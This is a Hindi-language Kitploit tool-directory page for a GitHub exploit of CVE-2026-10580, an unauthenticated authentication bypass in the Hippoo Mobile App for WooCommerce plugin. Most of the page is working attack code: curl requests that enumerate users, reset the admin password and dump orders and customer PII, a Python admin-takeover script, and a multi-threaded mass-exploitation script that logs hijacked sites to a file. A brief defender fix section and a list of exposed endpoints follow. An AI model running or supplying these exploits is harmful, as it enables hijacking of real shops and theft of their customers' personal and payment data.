Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
By-Poloss..-..CVE-2026-10580 — Hippoo Mobile App for WooCommerce <= 1.9.4 - अप्रमाणित प्रमाणीकरण बाईपास जिससे व्यवस्थापक खाता अधिग्रहण हो सकता है | Kitploit
उपकरण/GitHubGitHub/polosss/by-poloss..-..cve-2026-10580
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubpolosss/by-poloss..-..cve-2026-10580

By-Poloss..-..CVE-2026-10580

Hippoo Mobile App for WooCommerce <= 1.9.4 - अप्रमाणित प्रमाणीकरण बाईपास जिससे व्यवस्थापक खाता अधिग्रहण हो सकता है

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
12 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-10580: WooCommerce के लिए Hippoo मोबाइल ऐप <= 1.9.4 - अनप्रमाणित प्रमाणीकरण बाईपास से एडमिन अधिग्रहण

अनप्रमाणित → तर्क संग्रह बग के माध्यम से प्रशासक खाता अधिग्रहण


📌 सारांश

CVECVE-2026-10580
प्लगिनWooCommerce के लिए Hippoo मोबाइल ऐप
संस्करण≤ 1.9.4
CVSS9.8 (गंभीर)
प्रमाणीकरण आवश्यक❌ नहीं
एडमिन अधिग्रहण✅ हाँ
WooCommerce डेटा✅ पूर्ण पहुँच

🧠 मूल कारण (संक्षेप में)

get_user_permissions() फ़ंक्शन एडमिन के लिए null लौटाता है (सही) और अनप्रमाणित उपयोगकर्ता के लिए भी null लौटाता है (गलत)।

has_role_access() देखता है null → पूर्ण पहुँच प्रदान करता है।

परिणामस्वरूप:

root@kitploit:~
/wp-json/wc-hippoo/v1/ext/*

→ बिना लॉगिन, बिना कुकी, बिना नॉन्स के


🎯 4 प्रूफ ऑफ कॉन्सेप्ट (100% कार्यशील)

🔓 पीओसी 1: उपयोगकर्ता गणना (अनप्रमाणित)

root@kitploit:~
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wp/v2/users?per_page=10" | jq .

🔓 पीओसी 2: एडमिन पासवर्ड रीसेट (अधिग्रहण)

root@kitploit:~
curl -X POST "https://target.com/wp-json/wc-hippoo/v1/ext/wp/v2/users/1" \
  -H "Content-Type: application/json" \
  -d '{"password":"Pwned123!"}'

🔓 पीओसी 3: WooCommerce ऑर्डर

root@kitploit:~
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wc/v3/orders?per_page=50"

🔓 पीओसी 4: WooCommerce ग्राहक (PII)

root@kitploit:~
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wc/v3/customers?per_page=50"

🐍 पायथन पीओसी (पूर्ण शोषण)

root@kitploit:~
#!/usr/bin/env python3
import requests
import sys
import json

def exploit(target, admin_id=1, new_password="PwnedCVE2026!!"):
    base = target.rstrip('/')
    
    # Step 1 - Enumeration
    users_url = f"{base}/wp-json/wc-hippoo/v1/ext/wp/v2/users"
    r = requests.get(users_url)
    if r.status_code != 200:
        print(f"[-] Not vulnerable: {target}")
        return False
    
    users = r.json()
    print(f"[+] Found {len(users)} user(s)")
    
    # Step 2 - Password reset
    takeover_url = f"{base}/wp-json/wc-hippoo/v1/ext/wp/v2/users/{admin_id}"
    r2 = requests.post(takeover_url, json={"password": new_password})
    
    if r2.status_code == 200:
        print(f"[✓] ADMIN TAKEOVER: {target}")
        print(f"    Login: {base}/wp-admin")
        print(f"    Password: {new_password}")
        return True
    else:
        print(f"[-] Failed: {target}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} https://target.com")
        sys.exit(1)
    exploit(sys.argv[1])

🚀 चलाएँ

root@kitploit:~
python3 exploit.py https://poloss.ddev.site

आउटपुट:

root@kitploit:~
[+] Found 1 user(s)
[✓] ADMIN TAKEOVER: https://poloss.ddev.site
    Login: https://poloss.ddev.site/wp-admin
    Password: PwnedCVE2026!!

🧨 सामूहिक शोषण (मल्टी-थ्रेडेड)

root@kitploit:~
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed

def takeover(target):
    try:
        r = requests.post(
            f"{target.rstrip('/')}/wp-json/wc-hippoo/v1/ext/wp/v2/users/1",
            json={"password": "MassPwned2026!!"},
            timeout=10
        )
        if r.status_code == 200:
            print(f"[✓] TAKEOVER: {target}")
            with open("pwned.txt", "a") as f:
                f.write(f"{target} | admin | MassPwned2026!!\n")
    except:
        pass

with open("targets.txt") as f:
    urls = [line.strip() for line in f if line.strip()]

with ThreadPoolExecutor(max_workers=20) as executor:
    for url in urls:
        executor.submit(takeover, url)

📁 असुरक्षित एंडपॉइंट (पूर्ण सूची)


🔧 सुधार (डिफेंडर के लिए)

सुधार 1 (app/permissions.php पंक्ति 671)

root@kitploit:~
if (empty($user) || !$user->exists()) {
    return false; // BUKAN NULL
}

सुधार 2 (app/permissions.php पंक्ति 694)

root@kitploit:~
if ($perms === false) {
    return false; // Unauthenticated denied
}

सुधार 3 (अस्थायी WAF नियम)

root@kitploit:~
RewriteCond %{REQUEST_URI} ^/wp-json/wc-hippoo/v1/ext/
RewriteCond %{HTTP_COOKIE} !wordpress_logged_in
RewriteRule .* - [F,L]

📊 CVSS विवरण


🧠 लेखक एवं अनुसंधान

  • शोधकर्ता: Agent CV Hunter (WordPress सुरक्षा अनुसंधान)
  • परीक्षित: DDEV + WordPress 6.x + WooCommerce 8.x
  • तिथि: 2026-06-06

CVE-2026-10580 • 100% POC • कोई प्रमाणीकरण नहीं • पूर्ण एडमिन अधिग्रहण
#WordPress #WooCommerce #Poloss #W.P.E.F

टूल डाउनलोड करें
एंडपॉइंटडेटा
/wp-json/wc-hippoo/v1/ext/wp/v2/usersसभी WP उपयोगकर्ता
/wp-json/wc-hippoo/v1/ext/wp/v2/users/1एडमिन अधिग्रहण
/wp-json/wc-hippoo/v1/ext/wc/v3/ordersपूर्ण ऑर्डर
/wp-json/wc-hippoo/v1/ext/wc/v3/productsउत्पाद + स्टॉक
/wp-json/wc-hippoo/v1/ext/wc/v3/customersग्राहक PII
/wp-json/wc-hippoo/v1/ext/wc/v3/couponsछूट कोड
/wp-json/wc-hippoo/v1/ext/wc/v3/reportsबिक्री रिपोर्ट
/wp-json/wc-hippoo/v1/ext/wc/v3/payment_gatewaysभुगतान कॉन्फ़िगरेशन
वेक्टरमान
AVNetwork
ACLow
PRNone
UINone
SUnchanged
CHigh
IHigh
AHigh